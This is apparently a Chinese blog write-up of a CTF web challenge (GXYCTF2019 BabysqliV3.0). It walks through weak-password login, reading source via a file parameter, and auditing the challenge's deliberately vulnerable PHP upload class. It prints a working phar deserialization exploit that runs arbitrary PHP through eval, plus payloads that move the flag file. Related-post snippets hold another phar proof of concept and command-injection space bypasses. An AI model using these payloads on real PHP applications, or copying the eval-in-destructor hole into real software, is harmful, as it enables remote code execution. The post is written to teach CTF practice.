[GXYCTF2019]BabysqliV3.0 phar反序列化

最新推荐文章于 2023-04-03 22:09:52 发布
最新推荐文章于 2023-04-03 22:09:52 发布
阅读量225 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54929891/article/details/124785091
版权

随便输入两个1

 

看来是要admin登录了,密码我起初以为通过万能密码可以绕过,结果没反应,最后试了一下top100爆破,出来了密码就是password

 进入后看到url有一个file参数对应的是upload,页面提示我们现在是引用的upload.php文件,因此我们可以利用伪协议来读取源码了

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
    if(isset($_GET['file'])){
        if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
            die("hacker!");
        }
        else{
            if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){//只准读取home和upload的源代码
                $file = $_GET['file'].".php";
            }
            else{
                $file = $_GET['file'].".fxxkyou!";
            }
            echo "当前引用的是 ".$file;
            require $file;
        }

    }
    else{
        die("no permission!");
    }
}
?>

下载完home.php源码后我就没有看,继续读取别的源码发现读取不了,一看home.php限制了名字,我们还可以读取一个upload.php的源码

<?php
class Uploader{
    public $Filename;
    public $cmd;
    public $token;


    function __construct(){
        $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
        $ext = ".txt";
        @mkdir($sandbox, 0777, true);
        if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
            $this->Filename = $_GET['name'];//暗示phar反序列化
        }
        else{
            $this->Filename = $sandbox.$_SESSION['user'].$ext;
        }

        $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
        $this->token = $_SESSION['user'];
    }

    function upload($file){
        global $sandbox;
        global $ext;

        if(preg_match("[^a-z0-9]", $this->Filename)){//只能数字和字母组成
            $this->cmd = "die('illegal filename!');";
        }
        else{
            if($file['size'] > 1024){
                $this->cmd = "die('you are too big (′▽`〃)');";
            }
            else{
                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
            }
        }
    }

    function __toString(){
        global $sandbox;
        global $ext;
        // return $sandbox.$this->Filename.$ext;
        return $this->Filename;
    }

    function __destruct(){
        if($this->token != $_SESSION['user']){
            $this->cmd = "die('check token falied!');";
        }
        eval($this->cmd);
    }
}

if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    if(@file_get_contents($uploader)){
        echo "下面是你上传的文件:<br>".$uploader."<br>";// $this->Filename = $sandbox.$_SESSION['user'].$ext;
        echo file_get_contents($uploader);
    }
}

?>

看见魔法方法,又是文件上传,看来这题考的就是phar反序列化上传了

因为代码不多,我们一个个看

function __construct(){
        $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
        $ext = ".txt";
        @mkdir($sandbox, 0777, true);
        if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
            $this->Filename = $_GET['name'];//暗示phar反序列化
        }
        else{
            $this->Filename = $sandbox.$_SESSION['user'].$ext;
        }

        $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
        $this->token = $_SESSION['user'];
    }

构造函数:创建了一个自定义的目录,并且对有无name参数的情况给了Filename不同的赋值

function upload($file){
        global $sandbox;
        global $ext;

        if(preg_match("[^a-z0-9]", $this->Filename)){//只能数字和字母组成
            $this->cmd = "die('illegal filename!');";
        }
        else{
            if($file['size'] > 1024){
                $this->cmd = "die('you are too big (′▽`〃)');";
            }
            else{
                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
            }
        }
    }

上传函数:Filename如果 不是纯字母和数字,那么就会将die命令赋值给cmd,否则将move_uploaded_file命令赋值给cmdPHP move_uploaded_file() 函数

$_FILES name和tmp_name有什么区别_Leroi_Liu的博客-CSDN博客,这里代表着会将我们上传的文件位置移到Filename处

function __toString(){
        global $sandbox;
        global $ext;
        // return $sandbox.$this->Filename.$ext;
        return $this->Filename;
    }

魔法方法,当对象被当作字符串的时候调用,返回Filename

function __destruct(){
        if($this->token != $_SESSION['user']){
            $this->cmd = "die('check token falied!');";
        }
        eval($this->cmd);
    }

析构函数,当$this->token不等于$_SESSION['user']的时候会给cmd赋值给die命令,最后eval输出,可以联想到构造函数里面有个$_SESSION['user'],有点类似于认证机制

if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    if(@file_get_contents($uploader)){
        echo "下面是你上传的文件:<br>".$uploader."<br>";// $this->Filename = $sandbox.$_SESSION['user'].$ext;
        echo file_get_contents($uploader);
    }
}

当上传文件,实例化类,调用upload函数,如果Filename文件存在,则会输出字符串的拼接,可以看到file_get_contents函数和字符串拼接都将对象当作了字符串,因此会调用toString魔术方法,于是$uploader就相当于$Filename

做题思路:

1、因为最后会输出Filename,而且当我们没有传入name参数的时候,Filename构造为

$this->Filename = $sandbox.$_SESSION['user'].$ext;

因此我们先随便上传一个文件来输出echo中的$_SESSION['user'],并且构造他,帮助我们以后绕过认证机制

可以发现我们还要点一次上传才会出来

这是因为他输出的是toString方法中的$this->Filename,且$this->Filename = $sandbox.$_SESSION['user'].$ext;因为这是我们拼接的字符串路径,那么怎么会有真的文件存在呢,我们第一次上传的文件应该在$file['tmp_name']里面,因此第一次上传的时候

if(@file_get_contents($uploader))

 这个if语句没有执行成功,因此没有回显;最开始我一直在想为什么按两次,不是有一个move_uploaded_file函数吗,这里注意

$this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";

这只是一个赋值语句,真正执行的语句在析构函数那里

 因此只有第一次销毁后才会出来,也就是第二次上传的时候。

$upload->token = 'GXY9eb054261a06360e5cfcc5c4e9d86a81';

2、构造phar序列化,利用可控点eval,将我们想要执行的命令写入文件中,待到析构函数的时候执行move_uploaded_file将传入的内容写入给我们的那个文件地址,然后利用name参数传入phar伪协议来将给我们的文件进行反序列化,从而输出我们的执行命令

<?php
class Uploader{
    public $Filename;
    public $cmd;
    public $token;
}

$upload = new Uploader();
$upload->cmd = 'highlight_file("/var/www/html/flag.php");';
$upload->Filename = 'test';
$upload->token = 'GXY9eb054261a06360e5cfcc5c4e9d86a81';
echo serialize($upload);
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($upload);
$phar->addFromString("exp.txt", "test");
$phar->stopBuffering();

我们只需要赋值好我们的变量即可,phar生成模板网上一大把,这里其实Filename的作用就是为了绕过die,随便一个字母都可以

可以看到传入序列化串成功了,给name参数赋值以达到我们自主控制Filename参数

利用 file_get_contents()函数触发我们的phar反序列化

name=phar:///var/www/html/uploads/6a2f0a406467ba130c864e9f76e27a7e/GXY9eb054261a06360e5cfcc5c4e9d86a81.txt

 成功执行!bingo!

第二种方法较为简单,我也是看了别人的wp恍然大悟,自己没往那方面想,只是顺着题目意思来了(或许这就是别人拿一血的原因)

if(isset($_FILES['file'])) {
    $uploader = new Uploader();
    $uploader->upload($_FILES["file"]);
    if(@file_get_contents($uploader)){
        echo "下面是你上传的文件:<br>".$uploader."<br>";// $this->Filename = $sandbox.$_SESSION['user'].$ext;
        echo file_get_contents($uploader);
    }
}

从第一种方法可知$uploader是可控的

name=/var/www/html/flag.php

我们只需要先传入name参数,Filename就是我们所传的flag.php路径,因为flag.php服务器本身就已经存在了,因此析构函数的时候会将flag.php移到Filename处,然后上传个文件执行echo语句即可(环境好像只能每一次用一次,因为flag.php的位置移动后就变了,后面一直相同的payload就是不出来)

 对phar又理解了一些

-栀蓝-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019]BabysqliV3.0 [phar]
qq_40327508的博客
11-25 1460
打开题目是登录界面,使用burp爆破出密码是password 登录 上传文件,以及url里有拼接file参数,可能有文件包含漏洞 使用php伪协议获取upload源码 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil
利用PHAR协议进行PHP序列攻击1
08-03
【PHP序列攻击利用PHAR协议详解】 PHP序列攻击是一种常见的安全漏洞利用方式,其中PHAR(Php ARchive)协议是这类攻击的一个关键路径。PHAR是PHP中用于打包和分发代码的机制,类似于Java的JAR文件。在...
从一道ctf题中学会了利用LD_PRELOAD突破disable_functions
蚁景网安学院
11-28 741
前言从一道ctf题中学会了利用LD_PRELOAD突破disable_functions。题目分析这是一个白盒测试,提供了完整的源代码。下面是进入这个挑战的首页面,你将会看到一个简单的登...
[GXYCTF2019]BabysqliV3.0
LYJ20010728的博客
05-19 924
[GXYCTF2019]BabysqliV3.0考点思路Payload预期解法非预期解法 考点 弱口令、PHP序列 思路 ①:题目页面提示我们应该是需要sqli注入,但是用它输入框提示的admin/password一试就进去了… ②:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload熟悉的形式,用php伪协议读取一下文件试试; ③:预期解法:审计 upload.php 代码,$this-&g
BUUCTF [GXYCTF2019]BabySQli实战
永远是少年
12-14 653
今天继续给大家介绍CTF刷题,本文主要内容是BUUCTF [GXYCTF2019]BabySQli实战。 一、题目基本情况 二、解题思路 三、题目评析
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3268
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
Laravel8序列POP链分析挖掘 .pdf
09-05
在Laravel 8中,作者提到了CVE-2021-3129,这是一个在Debug模式下可能导致任意代码执行的漏洞,它涉及到Phar序列。然而,随着框架版本的升级,Laravel对某些类添加了`__wake`方法以限制序列,这使得传统的...
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和序列)1
08-03
虽然`file_get_contents`和`file_put_contents`可以触发文件操作,但由于路径控制有限,它们不能直接用于Phar序列攻击。然而,通过全局搜索`is_dir`函数,作者发现了`scanFilesForTree`方法,其中的`$dir`变量是...
mix-phar-skeleton:Phar命令行程序开发框架
04-24
Mix Phar Skeleton 命令行单执行文件 Phar 开发程序骨架,Mix 封装的命令行基础设施在骨架中都可使用。 我们提供了打包工具 ,可以将本项目打包为 Phar 文件(就像 golang 编译成执行文件一样)。 PHP 原本就是一个...
PHP中phar包的使用教程
10-19
这里,`new Phar('swoole.phar')`指定了生成的`phar`文件名为`swoole.phar`。`buildFromDirectory`方法用于指定要打包的目录(本例中为当前目录的上一级),第二个参数是一个正则表达式,匹配需要包含的PHP文件(仅...
[GXYCTF2019]BabysqliV3.0-phar序列正解
soldi_er的博客
06-08 503
文章目录phar序列漏洞利用条件构造payload文件漏洞利用参考收获   CSDN已经记录登录过程,弱口令登录,不再赘述。 phar序列漏洞利用条件   可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)upload.php可以上传文件。   (2)upload.php,具有执行命令的魔法函数。 class Uploader{ public $Filename; public $cmd; public $token; function __destr
[GXYCTF2019]BabysqliV3.0-phar序列
soldi_er的博客
05-19 1008
文章目录前期漏洞探测探测SQL注入探测文件上传探测文件包含漏洞序列利用-审计源码宽字节概念函数addslashes() 前期漏洞探测 探测SQL注入   登陆框。   面对登陆框时,可以使用admin测试盲注。或者使用pw测。   先fuzz一波,返回的都是"no this user",没有防火墙提醒。   存在admin用户。在name中测7种闭合方式,都返回"no this user"。 admin'%23、')、'")、'))。"、")、"))。   这才贴合实战,要是实战基本就放弃了。一看就知
[GXYCTF2019]BabySQli
个人笔记
04-03 105
源码显示过滤了() or = 四个字符,同时需要查询到的数据数组第二位是admin,password使用md5加密后与查询到的第三位相等即可输出flag,于是可以通过mysql数据库会自动构建返回虚拟数据进行绕过。知识点:绕过主要利用了mysql自动构建虚拟数据返回的原理。3,用bp爆破测试一下被绕过的关键字。4,手动绕过,直接找源码看绕过点吧。1、可以使用sqlmap自动跑。
BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar序列pop链
u013119911的博客
06-30 1363
题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:即可进入 至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息, 在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计。 这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,......
ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现
qq_42942226的博客
11-07 839
ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1395
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
GXYCTF web部分简要分析
a3320315的博客
01-25 707
0x01 ping ping ping 很明显的命令注入,我们用管道符号|即可执行我们想要的命令 空格被过滤了,绕过空格的方法有很多,比如 {cat,flag.txt} cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt kg=$'\x20flag.txt'&&cat$kg (\x20转...
phar序列poc
最新发布
05-21
Phar序列漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行序列攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器序列恶意代码,从而实现远程代码执行。 一个简单的Phar序列POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其序列到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是序列漏洞? 3. 如何防范Phar序列漏洞?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值